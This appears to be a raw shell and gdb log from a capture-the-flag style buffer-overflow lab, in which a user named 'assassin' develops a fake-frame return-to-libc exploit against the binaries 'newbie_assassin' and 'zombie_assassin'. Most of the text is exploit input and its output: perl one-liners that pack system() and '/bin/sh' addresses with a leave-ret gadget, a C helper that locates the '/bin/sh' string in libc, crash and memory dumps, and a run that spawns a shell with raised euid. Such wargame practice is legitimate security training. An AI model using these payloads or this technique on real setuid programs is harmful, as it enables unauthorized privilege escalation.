0x8048469 <main+41>:    mov    (%eax),%edx

0x804846b <main+43>:    add    $0x2f,%edx

0x804846e <main+46>:    cmpb   $0xbf,(%edx)

0x8048471 <main+49>:    jne    0x8048490 <main+80>

0x8048473 <main+51>:    push   $0x804854c

0x8048478 <main+56>:    call   0x8048354 <printf>

0x804847d <main+61>:    add    $0x4,%esp

0x8048480 <main+64>:    push   $0x0

0x8048482 <main+66>:    call   0x8048364 <exit>

0x8048487 <main+71>:    add    $0x4,%esp

0x804848a <main+74>:    lea    0x0(%esi),%esi

0x8048490 <main+80>:    mov    0xc(%ebp),%eax

0x8048493 <main+83>:    add    $0x4,%eax

0x8048496 <main+86>:    mov    (%eax),%edx

0x8048498 <main+88>:    add    $0x2f,%edx

0x804849b <main+91>:    cmpb   $0x40,(%edx)

0x804849e <main+94>:    jne    0x80484b7 <main+119>

0x80484a0 <main+96>:    push   $0x8048561

0x80484a5 <main+101>:   call   0x8048354 <printf>

0x80484aa <main+106>:   add    $0x4,%esp

0x80484ad <main+109>:   push   $0x0

0x80484af <main+111>:   call   0x8048364 <exit>

0x80484b4 <main+116>:   add    $0x4,%esp

---Type <return> to continue, or q <return> to quit---

0x80484b7 <main+119>:   push   $0x30

0x80484b9 <main+121>:   mov    0xc(%ebp),%eax

0x80484bc <main+124>:   add    $0x4,%eax

0x80484bf <main+127>:   mov    (%eax),%edx

0x80484c1 <main+129>:   push   %edx

0x80484c2 <main+130>:   lea    0xffffffd8(%ebp),%eax

0x80484c5 <main+133>:   push   %eax

0x80484c6 <main+134>:   call   0x8048374 <strncpy>

0x80484cb <main+139>:   add    $0xc,%esp

0x80484ce <main+142>:   lea    0xffffffd8(%ebp),%eax

0x80484d1 <main+145>:   push   %eax

0x80484d2 <main+146>:   push   $0x804857e

0x80484d7 <main+151>:   call   0x8048354 <printf>

0x80484dc <main+156>:   add    $0x8,%esp

0x80484df <main+159>:   leave

0x80484e0 <main+160>:   ret

End of assembler dump.

[assassin@localhost assassin]$ bash2

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ my-pass

euid = 516

[assassin@localhost assassin]$ cat foo.c

main(){

        char *p;

        p = 0x4002c000;

        while (1) {

                while (*p++ != '/') ;

                if (strcmp(p-1, "/bin/sh") == 0) {

                        printf("0x%08x\n", p-1);

                        return 0;

                }

        }

}

login: assassin

Password:

Last login: Thu Apr 24 17:43:56 from 192.168.10.1

[assassin@localhost assassin]$ bash2

[assassin@localhost assassin]$ payload= [dummyx4, system()[0x40058ae0], dummyx4, binsh[0xbffffc79], nopx24] [sfp->buffer[0xbffffc1a]] [ret->leaveret[0x80484df]]

bash: syntax error near unexpected token `system()'

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -q ./newbie_assassin

(gdb) disas main

Dump of assembler code for function main:

0x8048440 <main>:       push   %ebp

0x8048441 <main+1>:     mov    %esp,%ebp

0x8048443 <main+3>:     sub    $0x28,%esp

0x8048446 <main+6>:     cmpl   $0x1,0x8(%ebp)

0x804844a <main+10>:    jg     0x8048463 <main+35>

0x804844c <main+12>:    push   $0x8048540

0x8048451 <main+17>:    call   0x8048354 <printf>

0x8048456 <main+22>:    add    $0x4,%esp

0x8048459 <main+25>:    push   $0x0

0x804845b <main+27>:    call   0x8048364 <exit>

0x8048460 <main+32>:    add    $0x4,%esp

0x8048463 <main+35>:    mov    0xc(%ebp),%eax

0x8048466 <main+38>:    add    $0x4,%eax

0x8048469 <main+41>:    mov    (%eax),%edx

0x804846b <main+43>:    add    $0x2f,%edx

0x804846e <main+46>:    cmpb   $0xbf,(%edx)

0x8048471 <main+49>:    jne    0x8048490 <main+80>

0x8048473 <main+51>:    push   $0x804854c

0x8048478 <main+56>:    call   0x8048354 <printf>

0x804847d <main+61>:    add    $0x4,%esp

0x8048480 <main+64>:    push   $0x0

0x8048482 <main+66>:    call   0x8048364 <exit>

0x8048487 <main+71>:    add    $0x4,%esp

0x804848a <main+74>:    lea    0x0(%esi),%esi

0x8048490 <main+80>:    mov    0xc(%ebp),%eax

0x8048493 <main+83>:    add    $0x4,%eax

0x8048496 <main+86>:    mov    (%eax),%edx

0x8048498 <main+88>:    add    $0x2f,%edx

0x804849b <main+91>:    cmpb   $0x40,(%edx)

---Type <return> to continue, or q <return> to quit---

0x804849e <main+94>:    jne    0x80484b7 <main+119>

0x80484a0 <main+96>:    push   $0x8048561

0x80484a5 <main+101>:   call   0x8048354 <printf>

0x80484aa <main+106>:   add    $0x4,%esp

0x80484ad <main+109>:   push   $0x0

0x80484af <main+111>:   call   0x8048364 <exit>

0x80484b4 <main+116>:   add    $0x4,%esp

0x80484b7 <main+119>:   push   $0x30

0x80484b9 <main+121>:   mov    0xc(%ebp),%eax

0x80484bc <main+124>:   add    $0x4,%eax

0x80484bf <main+127>:   mov    (%eax),%edx

0x80484c1 <main+129>:   push   %edx

0x80484c2 <main+130>:   lea    0xffffffd8(%ebp),%eax

0x80484c5 <main+133>:   push   %eax

0x80484c6 <main+134>:   call   0x8048374 <strncpy>

0x80484cb <main+139>:   add    $0xc,%esp

0x80484ce <main+142>:   lea    0xffffffd8(%ebp),%eax

0x80484d1 <main+145>:   push   %eax

0x80484d2 <main+146>:   push   $0x804857e

0x80484d7 <main+151>:   call   0x8048354 <printf>

0x80484dc <main+156>:   add    $0x8,%esp

0x80484df <main+159>:   leave

0x80484e0 <main+160>:   ret

0x80484e1 <main+161>:   nop

0x80484e2 <main+162>:   nop

0x80484e3 <main+163>:   nop

0x80484e4 <main+164>:   nop

0x80484e5 <main+165>:   nop

0x80484e6 <main+166>:   nop

0x80484e7 <main+167>:   nop

---Type <return> to continue, or q <return> to quit---q

Quit

(gdb) b *main+160

Breakpoint 1 at 0x80484e0

(gdb) r `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

Starting program: /home/assassin/./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü

Breakpoint 1, 0x80484e0 in main ()

(gdb) x/wx $esp

0xbffffacc:     0x00000000

(gdb) r `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xaa\xbf", "\xdf\x84\x04\x08"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/assassin/./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xaa\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(üª¿߄

Breakpoint 1, 0x80484e0 in main ()

(gdb) x/wx $esp

0xbffffacc:     0x080484df

(gdb) x/i 0x80484df

0x80484df <main+159>:   leave

(gdb) i r ebp

Ambiguous info command "r ebp": registers, remote-process.

(gdb) i reg ebp

ebp            0xbfaafc28       -1079313368

(gdb) set $ebp=0xbffffc28

(gdb) x/20wx 0xbffffc28

0xbffffc28:     0x6e697373      0x41414100      0x058ae041      0x42424240

0xbffffc38:     0x0fbff942      0x90909040      0x90909090      0x90909090

0xbffffc48:     0x90909090      0x90909090      0x90909090      0xaafc2890

0xbffffc58:     0x0484dfbf      0x454c0008      0x504f5353      0x7c3d4e45

0xbffffc68:     0x7273752f      0x6e69622f      0x73656c2f      0x70697073

(gdb) x/20wx 0xbffffc2a

0xbffffc2a:     0x41006e69      0xe0414141      0x4240058a      0xf9424242

0xbffffc3a:     0x90400fbf      0x90909090      0x90909090      0x90909090

0xbffffc4a:     0x90909090      0x90909090      0x28909090      0xdfbfaafc

0xbffffc5a:     0x00080484      0x5353454c      0x4e45504f      0x752f7c3d

0xbffffc6a:     0x622f7273      0x6c2f6e69      0x70737365      0x2e657069

(gdb) x/20wx 0xbffffc2b

0xbffffc2b:     0x4141006e      0x8ae04141      0x42424005      0xbff94242

0xbffffc3b:     0x9090400f      0x90909090      0x90909090      0x90909090

0xbffffc4b:     0x90909090      0x90909090      0xfc289090      0x84dfbfaa

0xbffffc5b:     0x4c000804      0x4f535345      0x3d4e4550      0x73752f7c

0xbffffc6b:     0x69622f72      0x656c2f6e      0x69707373      0x732e6570

(gdb) x/20wx 0xbffffc9

0xbffffc9:      Cannot access memory at address 0xbffffc9

(gdb) x/20wx 0xbffffc29

0xbffffc29:     0x006e6973      0x41414141      0x40058ae0      0x42424242

0xbffffc39:     0x400fbff9      0x90909090      0x90909090      0x90909090

0xbffffc49:     0x90909090      0x90909090      0x90909090      0xbfaafc28

0xbffffc59:     0x080484df      0x53454c00      0x45504f53      0x2f7c3d4e

0xbffffc69:     0x2f727375      0x2f6e6962      0x7373656c      0x65706970

(gdb) x/20wx 0xbffffc2d

0xbffffc2d:     0x41414141      0x40058ae0      0x42424242      0x400fbff9

0xbffffc3d:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffc4d:     0x90909090      0x90909090      0xbfaafc28      0x080484df

0xbffffc5d:     0x53454c00      0x45504f53      0x2f7c3d4e      0x2f727375

0xbffffc6d:     0x2f6e6962      0x7373656c      0x65706970      0x2068732e

(gdb) q

The program is running.  Exit anyway? (y or n) y

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2d\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@-ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@-ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0xf9424242 in ?? ()

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `                  AAAAAAAABBBBù¿@(ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x24\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@$ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@$ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) q

[assassin@localhost assassin]$ ltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

[080483b1] __libc_start_main(0x08048440, 2, 0xbffffb24, 0x080482e4, 0x0804851c <unfinished ...>

[0804842b] __register_frame_info(0x08049590, 0x0804966c, 0xbffffae4, 0x08048309, 0x401081ec) = 0x40108d40

[080484cb] strncpy(0xbffffab0, "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 48) = 0xbffffab0

[080484dc] printf("%s\n", "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"...AAAA@BBBBù¿@

(ü ¿߄

) = 50

[8ae04141] --- SIGSEGV (Segmentation fault) ---

[ffffffff] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ sltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

bash2: sltrace: command not found

[assassin@localhost assassin]$ ltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

[080483b1] __libc_start_main(0x08048440, 2, 0xbffffb24, 0x080482e4, 0x0804851c <unfinished ...>

[0804842b] __register_frame_info(0x08049590, 0x0804966c, 0xbffffae4, 0x08048309, 0x401081ec) = 0x40108d40

[080484cb] strncpy(0xbffffab0, "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 48) = 0xbffffab0

[080484dc] printf("%s\n", "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"...AAAA@BBBBù¿@

*ü ¿߄

) = 50

[pid 4039] [40036cb5] --- SIGCHLD (Child exited) ---

[pid 4039] [42424242] --- SIGSEGV (Segmentation fault) ---

[pid 4039] [ffffffff] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿"], [/* 22 vars */]) = 0

[4000f78c] brk(0)                       = 0x8049684

[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)

[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

[4000ee8d] close(3)                     = 0

[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0

[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

[4000ee8d] close(3)                     = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

[4000f891] munmap(0x40015000, 12210)    = 0

[400ca7fd] personality(PER_LINUX)       = 0

[400aa257] getpid()                     = 4043

[400bdc8c] fstat64(0x1, 0xbffff2f8)     = -1 ENOSYS (Function not implemented)

[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿߄

) = 50

[40036ae2] rt_sigaction(SIGINT, {SIG_IGN}, {SIG_DFL}, 8) = 0

[40036ae2] rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

[40036cb5] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

[400a9cc8] vfork()                      = 4044

[400a98e9] wait4(4044, [WIFEXITED(s) && WEXITSTATUS(s) == 127], 0, NULL) = 4044

[40036ae2] rt_sigaction(SIGINT, {SIG_DFL}, NULL, 8) = 0

[40036ae2] rt_sigaction(SIGQUIT, {SIG_DFL}, NULL, 8) = 0

[40036cb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

[40036cb5] --- SIGCHLD (Child exited) ---

[42424242] --- SIGSEGV (Segmentation fault) ---

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "AAAA", "\xdf\x84\x04\x08"'`

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿AAAA"], [/* 22 vars */]) = 0

[4000f78c] brk(0)                       = 0x8049684

[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)

[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

[4000ee8d] close(3)                     = 0

[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0

[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

[4000ee8d] close(3)                     = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

[4000f891] munmap(0x40015000, 12210)    = 0

[400ca7fd] personality(PER_LINUX)       = 0

[400aa257] getpid()                     = 4047

[400bdc8c] fstat64(0x1, 0xbffff2e8)     = -1 ENOSYS (Function not implemented)

[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿AAAA

) = 50

[41414141] --- SIGSEGV (Segmentation fault) ---

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@*ü ¿AAAA'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/20wx $esp-40

0xbffffaa8:     0x42424242      0x400fbff9      0x90909090      0x90909090

0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac8:     0xbffffc2a      0x41414141      0x00000002      0xbffffb14

0xbffffad8:     0xbffffb20      0x40013868      0x00000002      0x08048390

0xbffffae8:     0x00000000      0x080483b1      0x08048440      0x00000002

(gdb) x/20wx $esp-60

0xbffffa94:     0x080484dc      0x0804857e      0xbffffaa0      0x41414141

0xbffffaa4:     0x40058ae0      0x42424242      0x400fbff9      0x90909090

0xbffffab4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac4:     0x90909090      0xbffffc2a      0x41414141      0x00000002

0xbffffad4:     0xbffffb14      0xbffffb20      0x40013868      0x00000002

(gdb) 6q

Undefined command: "6q".  Try "help".

(gdb) q

[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "AAAA"'`

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿AAAA"], [/* 22 vars */]) = 0

[4000f78c] brk(0)                       = 0x8049684

[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)

[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

[4000ee8d] close(3)                     = 0

[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0

[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

[4000ee8d] close(3)                     = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

[4000f891] munmap(0x40015000, 12210)    = 0

[400ca7fd] personality(PER_LINUX)       = 0

[400aa257] getpid()                     = 4051

[400bdc8c] fstat64(0x1, 0xbffff2f8)     = -1 ENOSYS (Function not implemented)

[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿AAAA

) = 50

[41414141] --- SIGSEGV (Segmentation fault) ---

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@*ü ¿AAAA'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/50wx $esp-60

0xbffffaa4:     0x080484dc      0x0804857e      0xbffffab0      0x41414141

0xbffffab4:     0x40058ae0      0x42424242      0x400fbff9      0x90909090

0xbffffac4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffad4:     0x90909090      0xbffffc2a      0x41414141      0x00000002

0xbffffae4:     0xbffffb24      0xbffffb30      0x40013868      0x00000002

0xbffffaf4:     0x08048390      0x00000000      0x080483b1      0x08048440

0xbffffb04:     0x00000002      0xbffffb24      0x080482e4      0x0804851c

0xbffffb14:     0x4000ae60      0xbffffb1c      0x40013e90      0x00000002

0xbffffb24:     0xbffffc18      0xbffffc2a      0x00000000      0xbffffc5b

0xbffffb34:     0xbffffc6e      0xbffffc86      0xbffffca5      0xbffffcc7

0xbffffb44:     0xbffffcd5      0xbffffe98      0xbffffeb7      0xbffffed5

0xbffffb54:     0xbffffeea      0xbfffff0a      0xbfffff15      0xbfffff26

0xbffffb64:     0xbfffff2e      0xbfffff38

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `                  AAAAAAAABBBBù¿@(ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()

(gdb)x/40wx $esp

0xbffffc34:     0x400fbff9      0x90909090      0x90909090      0x90909090

0xbffffc44:     0x90909090      0x90909090      0x90909090      0xbffffc28

0xbffffc54:     0x080484df      0x44575000      0x6f682f3d      0x612f656d

0xbffffc64:     0x73617373      0x006e6973      0x4f4d4552      0x4f484554

0xbffffc74:     0x313d5453      0x312e3239      0x312e3836      0x00312e30

0xbffffc84:     0x54534f48      0x454d414e      0x636f6c3d      0x6f686c61

0xbffffc94:     0x6c2e7473      0x6c61636f      0x616d6f64      0x4c006e69

0xbffffca4:     0x4f535345      0x3d4e4550      0x73752f7c      0x69622f72

0xbffffcb4:     0x656c2f6e      0x69707373      0x732e6570      0x73252068

0xbffffcc4:     0x45535500      0x73613d52      0x73736173      0x4c006e69

(gdb) x/40wx $esp-40

0xbffffc0c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc1c:     0x00000000      0x00000000      0x00000000      0x41414141

0xbffffc2c:     0x41414141      0x42424242      0x400fbff9      0x90909090

0xbffffc3c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffc4c:     0x90909090      0xbffffc28      0x080484df      0x44575000

0xbffffc5c:     0x6f682f3d      0x612f656d      0x73617373      0x006e6973

0xbffffc6c:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239

0xbffffc7c:     0x312e3836      0x00312e30      0x54534f48      0x454d414e

0xbffffc8c:     0x636f6c3d      0x6f686c61      0x6c2e7473      0x6c61636f

0xbffffc9c:     0x616d6f64      0x4c006e69      0x4f535345      0x3d4e4550

(gdb) x/40wx $esp-100

0xbffffbd0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbe0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbf0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc00:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc10:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc20:     0x00000000      0x00000000      0x41414141      0x41414141

0xbffffc30:     0x42424242      0x400fbff9      0x90909090      0x90909090

0xbffffc40:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffc50:     0xbffffc28      0x080484df      0x44575000      0x6f682f3d

0xbffffc60:     0x612f656d      0x73617373      0x006e6973      0x4f4d4552

(gdb) x/40wx $esp-200

0xbffffb6c:     0x00000000      0x00000000      0x40020e90      0x00000612

0xbffffb7c:     0x40021fd0      0x4001ad70      0x400143e0      0x00000003

0xbffffb8c:     0x40014650      0x00000001      0xbffff8ac      0x00000000

0xbffffb9c:     0x4003ec68      0x00000001      0x00000000      0x00000000

0xbffffbac:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbbc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbcc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbdc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbec:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbfc:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) x/40wx $esp-2000

0xbffff464:     0x4001797a      0x08048581      0x25000000      0x00000000

0xbffff474:     0x00000001      0x00000000      0x40014353      0x000ed000

0xbffff484:     0x00000000      0x00000000      0x00000000      0x00000000

